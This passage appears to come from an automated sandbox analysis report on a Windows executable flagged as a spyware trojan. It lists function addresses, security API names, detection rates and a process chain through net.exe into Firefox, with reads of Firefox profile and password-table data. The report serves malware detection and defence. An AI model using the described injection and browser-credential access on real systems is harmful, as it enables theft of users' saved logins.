                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190F0E04_2_0190F0E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019070E94_2_019070E9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0189739A4_2_0189739A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190132D4_2_0190132D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0183D34C4_2_0183D34C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018552A04_2_018552A0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186B2C04_2_0186B2C0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F12ED4_2_018F12ED
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018ED5B04_2_018ED5B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019195C34_2_019195C3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019075714_2_01907571
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190F43F4_2_0190F43F
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018414604_2_01841460
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190F7B04_2_0190F7B0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_019016CC4_2_019016CC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018956304_2_01895630
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018E59104_2_018E5910
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018599504_2_01859950
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186B9504_2_0186B950
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018538E04_2_018538E0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018BD8004_2_018BD800
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186FB804_2_0186FB80
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0188DBF94_2_0188DBF9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C5BF04_2_018C5BF0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190FB764_2_0190FB76
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018EDAAC4_2_018EDAAC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01895AA04_2_01895AA0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018F1AA34_2_018F1AA3
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018FDAC64_2_018FDAC6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01907A464_2_01907A46
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190FA494_2_0190FA49
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C3A6C4_2_018C3A6C
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0186FDC04_2_0186FDC0
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01853D404_2_01853D40
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01901D5A4_2_01901D5A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01907D734_2_01907D73
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190FCF24_2_0190FCF2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018C9C324_2_018C9C32
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01851F924_2_01851F92
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190FFB14_2_0190FFB1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01813FD24_2_01813FD2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01813FD54_2_01813FD5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0190FF094_2_0190FF09
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01859EB04_2_01859EB0
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_04893EF010_2_04893EF0
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_048B4C9010_2_048B4C90
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_04895D0710_2_04895D07
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_04895D1010_2_04895D10
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489E53010_2_0489E530
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_04895F3010_2_04895F30
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489C74010_2_0489C740
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_04893F4010_2_04893F40
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489408810_2_04894088
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489409010_2_04894090
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311A35211_2_0311A352
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031203E611_2_031203E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306E3F011_2_0306E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0310027411_2_03100274
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030E02C011_2_030E02C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0305010011_2_03050100
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030FA11811_2_030FA118
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030E815811_2_030E8158
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031141A211_2_031141A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031201AA11_2_031201AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031181CC11_2_031181CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030F200011_2_030F2000
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0308475011_2_03084750
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306077011_2_03060770
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0305C7C011_2_0305C7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307C6E011_2_0307C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306053511_2_03060535
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0312059111_2_03120591
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0310442011_2_03104420
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311244611_2_03112446
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0310E4F611_2_0310E4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311AB4011_2_0311AB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03116BD711_2_03116BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0305EA8011_2_0305EA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307696211_2_03076962
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030629A011_2_030629A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0312A9A611_2_0312A9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306284011_2_03062840
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306A84011_2_0306A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030468B811_2_030468B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0308E8F011_2_0308E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03102F3011_2_03102F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A2F2811_2_030A2F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03080F3011_2_03080F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030D4F4011_2_030D4F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030DEFA011_2_030DEFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03052FC811_2_03052FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306CFE011_2_0306CFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311EE2611_2_0311EE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03060E5911_2_03060E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311CE9311_2_0311CE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03072E9011_2_03072E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311EEDB11_2_0311EEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306AD0011_2_0306AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030FCD1F11_2_030FCD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03078DBF11_2_03078DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0305ADE011_2_0305ADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03060C0011_2_03060C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03100CB511_2_03100CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03050CF211_2_03050CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311132D11_2_0311132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0304D34C11_2_0304D34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A739A11_2_030A739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030652A011_2_030652A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307B2C011_2_0307B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031012ED11_2_031012ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0309516C11_2_0309516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0304F17211_2_0304F172
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0312B16B11_2_0312B16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306B1B011_2_0306B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030670C011_2_030670C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0310F0CC11_2_0310F0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311F0E011_2_0311F0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031170E911_2_031170E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311F7B011_2_0311F7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_031116CC11_2_031116CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311757111_2_03117571
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030FD5B011_2_030FD5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311F43F11_2_0311F43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0305146011_2_03051460
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311FB7611_2_0311FB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307FB8011_2_0307FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0309DBF911_2_0309DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030D5BF011_2_030D5BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03117A4611_2_03117A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311FA4911_2_0311FA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030D3A6C11_2_030D3A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030FDAAC11_2_030FDAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030A5AA011_2_030A5AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03101AA311_2_03101AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0310DAC611_2_0310DAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030F591011_2_030F5910
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0306995011_2_03069950
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307B95011_2_0307B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030CD80011_2_030CD800
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030638E011_2_030638E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311FF0911_2_0311FF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03061F9211_2_03061F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311FFB111_2_0311FFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03023FD211_2_03023FD2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03023FD511_2_03023FD5
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03069EB011_2_03069EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03063D4011_2_03063D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03111D5A11_2_03111D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03117D7311_2_03117D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0307FDC011_2_0307FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030D9C3211_2_030D9C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0311FCF211_2_0311FCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02811D8011_2_02811D80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280CE3011_2_0280CE30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280AE4011_2_0280AE40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280AF8811_2_0280AF88
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280AF9011_2_0280AF90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280CC0711_2_0280CC07
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0280CC1011_2_0280CC10
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0281364011_2_02813640
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0281543011_2_02815430
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0282BB9011_2_0282BB90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7E21411_2_02E7E214
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7E33511_2_02E7E335
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7E6CC11_2_02E7E6CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7D79811_2_02E7D798
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7CA4811_2_02E7CA48
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_02E7C9F611_2_02E7C9F6
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030DF290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03095130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030A7E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 030CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0304B970 appears 280 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 018CF290 appears 105 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 01885130 appears 58 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 018BEA12 appears 86 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 0183B970 appears 280 times
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: String function: 01897E54 appears 111 times
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000002.2210832795.000000000A240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000002.2202951824.0000000000F1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000000.00000000.2181381370.00000000007E0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePRRd.exeD vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.0000000001314000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenet.exej% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.000000000193D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenet.exej% vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exeBinary or memory string: OriginalFilenamePRRd.exeD vs Gd3lOevK672JYIK.zip.exe
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@14/9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Gd3lOevK672JYIK.zip.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\net.exeFile created: C:\Users\user\AppData\Local\Temp\35859UlfLqJump to behavior
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Gd3lOevK672JYIK.zip.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 0000000B.00000002.4649724687.0000000002C50000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4649724687.0000000002C46000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4649724687.0000000002C74000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2826936403.0000000002C46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Gd3lOevK672JYIK.zip.exeVirustotal: Detection: 38%
                Source: Gd3lOevK672JYIK.zip.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeProcess created: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe "C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exe"Jump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
